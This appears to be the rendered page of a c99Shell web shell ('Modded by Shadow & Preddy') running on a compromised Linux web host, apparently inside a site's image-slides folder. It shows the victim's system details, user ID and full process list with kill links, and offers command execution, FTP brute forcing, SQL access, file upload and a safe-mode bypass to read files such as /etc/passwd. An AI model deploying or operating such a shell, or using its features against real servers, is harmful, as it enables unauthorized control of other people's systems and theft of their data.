!c99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/5.6.40 

uname -a: Linux dns15359 2.6.32-48-pve #1 SMP Fri Dec 23 10:22:54 CET 2016 x86_64 

uid=10027(user_casade) gid=1003(psacln) groups=1003(psacln) 

Safe-mode: OFF (not secure)

/var/www/vhosts/casadeasturias.com/httpdocs/imagenesdb/slides/   drwxr-xr-x
Free 10.19 GB of 110 GB (9.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Processes:
USERPID%CPU%MEMVSZRSSTTYSTATSTARTTIMECOMMAND
bind198980.00.425444420740?SslJul170:05/usr/sbin/named -f -t /var/named/run-root -c /etc/named.conf -u bind -n 2KILL
dovecot289640.00.0106481732?SJul170:02dovecot/statsKILL
dovecot167450.00.09868972?SJul170:01dovecot/anvilKILL
dovenull242980.00.0210563716?S09:520:00dovecot/imap-loginKILL
dovenull242950.00.0211963796?S09:520:00dovecot/imap-loginKILL
dovenull216360.00.0212363668?S17:390:00dovecot/imap-loginKILL
dovenull242990.00.0211963788?S09:520:03dovecot/imap-loginKILL
dovenull242940.00.0211963736?S09:520:00dovecot/imap-loginKILL
dovenull311730.00.0212363696?SJul170:00dovecot/imap-loginKILL
librer_+243630.50.444369217928?S17:500:00php-fpm: pool libreriasindependientes.comKILL
memcache2710.00.03376401020?SslMay251:14/usr/bin/memcached -m 256 -p 11211 -u memcache -l 127.0.0.1KILL
mysql227360.09.51361940399716?SslJul0416:09/usr/sbin/mysqldKILL
popuser216370.00.0180442864?S17:390:00dovecot/imapKILL
popuser123160.00.0182363372?S16:290:00dovecot/imapKILL
popuser311740.00.1248324364?SJul170:00dovecot/imapKILL
popuser221810.00.0180482872?S17:430:00dovecot/imapKILL
popuser242970.00.0182203484?S09:520:00dovecot/imapKILL
popuser243010.00.0186083908?S09:520:02dovecot/imapKILL
popuser242960.00.1343567200?S09:520:01dovecot/imapKILL
popuser243000.00.0220084000?S09:520:00dovecot/imapKILL
popuser251490.22.116224089400?S13:570:42spamd childKILL
psaadm114470.00.726992032128?S03:410:00/usr/bin/sw-engine -c /opt/psa/admin/conf/php.ini /usr/local/psa/bin/extension --exec revisium-antivirus ra_executor.phpKILL
psaadm114490.00.726801629876?S03:410:10/usr/bin/sw-engine -c /opt/psa/admin/conf/php.ini -dauto_prepend_file=sdk.php /opt/psa/admin/plib/modules/revisium-antivirus/scripts/ra_executor.phpKILL
psaadm114480.00.04284656?S03:410:00sh -c '/opt/psa/admin/bin/php' -dauto_prepend_file=sdk.php '/opt/psa/admin/plib/modules/revisium-antivirus/scripts/ra_executor.php' 2>&1KILL
qmaill163670.00.04180476?SJul170:00splogger qmailKILL
qmailq163700.00.04176368?SJul170:00qmail-cleanKILL
qmailr163690.00.04220424?SJul170:00qmail-rspawnKILL
qmails163660.00.04232508?SsJul170:01qmail-sendKILL
root163680.00.04220392?SJul170:00qmail-lspawn | /usr/bin/deliverquota ./MaildirKILL
root289630.00.0258202412?SJul170:07dovecot/configKILL
root250380.00.0100001128?SJul170:01dovecot/logKILL
root197420.01.714768472876?SsJul170:14/usr/sbin/spamd -d --pidfile=/var/run/spamassassin.pid --create-prefs --daemonize --helper-home-dir=/var/qmail --max-children=1 --nouser-config --username=popuser --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassinKILL
root194850.00.341373214892?SsJul170:06php-fpm: master process (/etc/php5/fpm/php-fpm.conf)KILL
root10.00.01803003416?SsMay254:47init -zKILL
root167240.00.0184841368?SsJul170:05/usr/sbin/dovecot -FKILL
root152720.00.0364443924?S08:540:02dovecot/authKILL
root2730.00.0551321356?SsMay250:18/usr/sbin/sshd -DKILL
root4780.00.012612548tty5Ss+May250:00/sbin/agetty --noclear tty5 linuxKILL
root2650.00.24386928672?SsMay251:24php-fpm: master process (/opt/plesk/php/5.4/etc/php-fpm.conf)KILL
root2770.00.23395568912?SsMay251:23php-fpm: master process (/opt/plesk/php/5.5/etc/php-fpm.conf)KILL
root3990.00.065436876?SMay250:00/usr/sbin/saslauthd -a pam -c -m /var/run/saslauthd -n 2KILL
root3970.00.0654361136?SsMay250:00/usr/sbin/saslauthd -a pam -c -m /var/run/saslauthd -n 2KILL
root2830.00.026132800?SsMay250:15/usr/sbin/cron -fKILL
root2780.00.01869082420?SslMay253:53/usr/sbin/rsyslogd -nKILL
root2850.00.240962012160?SsMay251:48php-fpm: master process (/opt/plesk/php/5.6/etc/php-fpm.conf)KILL
root2860.00.24407049732?SsMay253:32php-fpm: master process (/opt/plesk/php/7.0/etc/php-fpm.conf)KILL
root3630.00.020164740?SsMay251:24/usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6KILL
root1080.00.77841633336?SsMay2515:14/lib/systemd/systemd-journaldKILL
root4790.00.012612552tty4Ss+May250:00/sbin/agetty --noclear tty4 linuxKILL
root20.00.000?SMay250:00[kthreadd/93134]KILL
root5010.00.012612548tty6Ss+May250:00/sbin/agetty --noclear tty6 linuxKILL
root48120.00.420308017980?SsJul170:03/usr/sbin/apache2 -k startKILL
root86100.00.0377681668?SsJul170:00sw-cp-server: master process /usr/sbin/sw-cp-serverd -c /etc/sw-cp-server/configKILL
root118300.00.639414825264?SsJul170:00sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf)KILL
root114420.00.040241504?Sl03:410:00plesk bin extension --exec revisium-antivirus ra_executor.phpKILL
root4820.00.012612612?SsMay250:00/sbin/agetty --noclear tty1 linuxKILL
root4830.00.012892580tty1Ss+May250:00/sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt102KILL
root4810.00.012612548tty2Ss+May250:00/sbin/agetty --noclear tty2 linuxKILL
root30.00.000?SMay250:00[khelper/93134]KILL
root4800.00.012612552tty3Ss+May250:00/sbin/agetty --noclear tty3 linuxKILL
root640.00.038860904?SsMay250:00/lib/systemd/systemd-udevdKILL
sw-cp-s+86110.00.0390323948?SJul170:00sw-cp-server: worker processKILL
systemd+2680.00.025696620?SsMay250:00/lib/systemd/systemd-resolvedKILL
user_ca+244060.00.0174481168?R17:500:00ps -auxKILL
user_ca+218362.40.441615616792?S17:410:13php-fpm: pool casadeasturias.comKILL
user_ca+233021.60.341564415616?R17:470:03php-fpm: pool casadeasturias.comKILL
user_ca+244050.00.04284648?S17:500:00sh -c ps -auxKILL
www-data243240.00.320333614104?S17:500:00/usr/sbin/apache2 -k startKILL
www-data227740.00.320373614852?S17:450:00/usr/sbin/apache2 -k startKILL
www-data221300.00.220309611864?S00:220:00/usr/sbin/apache2 -k startKILL
www-data217350.00.320374414880?S17:400:00/usr/sbin/apache2 -k startKILL
www-data213240.00.320401615288?S17:360:00/usr/sbin/apache2 -k startKILL
www-data180520.00.320450815868?S17:140:00/usr/sbin/apache2 -k startKILL
www-data222690.00.320372414928?S17:430:00/usr/sbin/apache2 -k startKILL
www-data225900.00.320378014804?S17:440:00/usr/sbin/apache2 -k startKILL
www-data231940.00.320362814636?S17:470:00/usr/sbin/apache2 -k startKILL
www-data231390.00.320332814292?S17:460:00/usr/sbin/apache2 -k startKILL
www-data225910.00.320363214740?S17:440:00/usr/sbin/apache2 -k startKILL
www-data232010.00.320366014668?S17:470:00/usr/sbin/apache2 -k startKILL

:: Command execute::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0086 ]--